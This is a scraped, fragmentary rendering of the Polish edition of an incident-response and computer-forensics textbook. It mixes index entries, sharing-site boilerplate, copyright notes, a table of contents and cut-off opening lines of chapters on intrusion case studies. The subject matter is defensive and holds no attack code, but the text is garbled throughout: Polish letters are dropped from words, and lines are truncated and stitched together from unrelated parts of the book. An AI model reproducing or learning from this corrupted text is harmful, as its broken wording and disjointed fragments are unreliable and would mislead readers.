danych aplikacji, 439 z jdra Linux, 178
informacji, 492 zestawy narzdzi, 165
informacji w przedsibiorstwie, 49 dowodw pocztkowych, 142
nazwy pliku, 512 dziennikw, 231
usunitych plikw, 293 informacji, 159, 161
wskanikw zagroenia, 82 informacji z pamici, 170
zdarzenia, 205, 312 znaczniki czasu, 294

bezpieczestwa informatycznego, 38 $FN, 297
dostpu do sieci, 231 $SI, 295
dotyczce bezpieczestwa, 312 MACE, 295
dotyczce zarzdzania kontem, 318 rejestru, 333
logowania, 313, 315 znak #, 323
sieciowe, 231 zrzut macierzy RAID, 201
usug, 319 zrzut pamici, 81, 178
uwierzytelniania Kerberos, 317 dla jednego procesu, 174
zmiany zasad, 318 jdra, 375
zdarzenie kompletny, 170
CacheInteractive, 315 may, 375
CreateFile, 511 peny, 375
inspekcji procesu, 318 pojedynczego procesu, 182
NetworkCleartext, 314 w systemie Apple OS X, 181
NewCredentials, 314 zrzuty awaryjne, 375
RemoteInteractive, 315 zwikszanie
zdobywanie tropw, 117 poziomu bezpieczestwa, 90
zesp naprawczy, 36, 536 uprawnie, 41
czonkowie, 539
lider, 537
zesp RI, 48, 51, 569

czonkowie, 49 rda
definiowanie misji, 72 danych, 274
dostp do konfiguracji sieci, 97 komputery stacjonarne, 274
informowanie o wynikach ledztwa, 75 kopie zapasowe, 275
komunikacja wewntrzna, 73 laptopy, 274
komunikacja z usugodawcami, 74 magazyny danych, 275
koszt utrzymywania, 50 noniki, 275
ocenianie przydatnoci kandydata, 52 systemy serwerowe, 275
oprogramowanie, 79 urzdzenia przenone, 275
procedury komunikacji, 73 urzdzenia sieciowe, 275
sprzt, 76 usugi chmurowe, 275
tworzenie dokumentacji, 82 dowodw, 434
zasoby, 76 informacji
zatrudnianie, 51 aplikacja, 276
zewntrzne firmy informatyczne, 70 czasowych, 392, 433
zewntrzni eksperci, 51 dane uytkownika, 276
zeznania naocznych wiadkw, 64 system operacyjny, 276
zgaszanie incydentu, 13 usugi sieciowe, 276
zlecanie zada, 50 ladw, 392
zoliwe oprogramowanie, 32
zmiana
bibliotek systemowych, 231
konfiguracji i procesw, 485
kont, 317
ustawie zabezpiecze, 317

Incydenty Bezpieczeństwa. Metody Reagowania W Informatyce Śledczej

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Incydenty Bezpieczeństwa. Metody Reagowania W Informatyce Śledczej

Uploaded by

Copyright:

Available Formats

Tytu oryginau: Incident Response & Computer Forensics, Third Edition

Tumaczenie: ukasz Piwko

Original edition copyright 2014 by McGraw-Hill Education.

Polish edition copyright 2016 by HELION SA

Wszelkie prawa zastrzeone. Nieautoryzowane rozpowszechnianie caoci

Wszystkie znaki wystpujce w tekcie s zastrzeonymi znakami firmowymi

Autor oraz Wydawnictwo HELION dooyli wszelkich stara, by zawarte

Pole ksik na Facebook.com Ksigarnia internetowa

Ryan Kazanciyan jest dyrektorem technicznym w firmie Mandiant z jedenastoletnim dowiadczeniem

1 Prawdziwe incydenty .................................................................................................................25

2 Podrcznik reagowania na incydenty bezpieczestwa . .....................................................45

Proces reakcji na incydent ................................................................................................................53

3 Przygotowanie na incydent . ................................................................................................... 67

CZ II Wykrywanie incydentw i ich charakterystyka

4 Prawidowe rozpoczynanie ledztwa . ..................................................................................103

5 Zdobywanie tropw ................................................................................................................117

Postpowanie z tropami .................................................................................................................119

6 Okrelanie zasigu incydentu . ..............................................................................................139

CZ III Gromadzenie danych

7 Zbieranie danych na ywo . ................................................................................................... 155

8 Duplikacja danych ledczych ................................................................................................. 185

Wykonywanie obrazu logicznego . ...........................................................................................................190

9 Dowody z sieci ...........................................................................................................................203

10 Usugi dla przedsibiorstw . ....................................................................................................233

Serwery sieciowe ..............................................................................................................................257

11 Metody analizy . ....................................................................................................................... 271

12 Prowadzenie czynnoci ledczych w systemach Windows . ............................................ 289

Zadania zaplanowane . ................................................................................................................... 322

13 Prowadzenie czynnoci ledczych w systemach Mac OS X ...............................................399

14 Badanie aplikacji .......................................................................................................................437

15 Sortowanie szkodliwych programw .................................................................................. 483

16 Pisanie raportw . .................................................................................................................... 515

17 Wprowadzenie do technik naprawczych . ...........................................................................529

Brana specjalistw reagowania na incydenty bezpieczestwa zmienia si 12 stycznia 2010 roku,

Cz II. Wykrywanie incydentw i ich charakterystyka

Cz III. Gromadzenie danych

Cz IV. Analiza danych

Cze VI. Dodatki

CO TO JEST INCYDENT BEZPIECZESTWA

Wiele agencji rzdowych i organizacji partnerskich, wielu kontrahentw i sporo firm

definicj nastpujco: kade bezprawne, nieautoryzowane lub nieakceptowalne dziaanie w systemie

CO TO JEST REAKCJA NA INCYDENT

AKTUALNY STAN WIEDZY

haszowanie plikw zaadowanych do pamici, moliwo weryfikowania certyfikatw cyfrowych

Studium przypadku 1. Gdzie s pienidze

Po przejciu do rodowiska korporacyjnego intruz przez kilka tygodni prowadzi szeroko

Drugi rodzaj zoliwego oprogramowania nazwiemy PROXY, poniewa przekazywao ono

W tym przypadku hakera interesoway informacje dotyczce kart kredytowych i debetowych,

do wielu kont administratorw domeny. Po uwierzytelnieniu si w JMPSRV haker przesa narzdzia

Tydzie po utworzeniu infrastruktury tylnych drzwi w rodowisku finansowym haker

Najwiksz trudnoci w tym ledztwie byo to, e musielimy caociowo spojrze na

Studium przypadku 2. Certyfikat autentycznoci

FAZY CYKLU ATAKU

Przypadek 1. Haker wykona zrzut hase i zama hasa administratorw domeny.

Uwaga W opisach wama zwykle bagatelizuje si rol rekonesansu wewntrznego przeprowadzanego

Szperanie w systemie haker wykorzystuje zdobyte dojcie do rodowiska w celu poruszania

Trzecia cecha decyduje o tym, e dane zdarzenie to wanie incydent bezpieczestwa

CELE REAKCJI NA INCYDENT

KTO BIERZE UDZIA

RYSUNEK 2.1. Skad zespou

Uwaga Uzyskanie uprawnie do wyszukiwania informacji w caym przedsibiorstwie moe by trudne,

W zespoach pomocniczych tworzonych w razie potrzeby z reguy nie musz znajdowa si

W niektrych sytuacjach odpowied na pytanie o zasig moe by znaleziona innymi rodkami